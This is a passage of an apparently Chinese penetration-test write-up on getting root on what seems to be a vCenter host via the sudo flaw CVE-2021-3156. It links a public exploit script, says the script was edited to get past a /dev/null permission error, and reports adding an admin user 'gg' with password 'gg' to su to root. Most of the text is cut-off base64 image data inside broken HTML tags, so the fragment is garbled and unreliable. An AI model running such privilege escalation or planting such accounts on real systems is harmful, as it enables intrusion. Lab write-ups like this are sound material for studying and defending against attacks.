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
<p blockindex=7>然后尝试利用CVE-2021-3156漏洞提升为root权限<br>
<a href=https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md>https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md</a></p>
<p blockindex=8><a href=https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_userspec.py>https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_userspec.py</a></p>
<p blockindex=9>但是第一次执行时遇到错误<br>
<img src="data:image/png;base64,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
<p blockindex=10>分析后发现是脚本执行到628行打开/dev/null权限不足，直接修改脚本<br>
<img src=data:image/png;base64,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
<p blockindex=11>发现null_fd并没有什么用，仅仅具有日志记录的作用，于是将其改为1.txt<br>
<img src="data:image/png;base64,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
<p blockindex=12>在上次报错的位置再次运行提权脚本，最终创建了一个gg用户（管理员权限，密码gg）,可以su到root账户上，至此提权成功！</p>
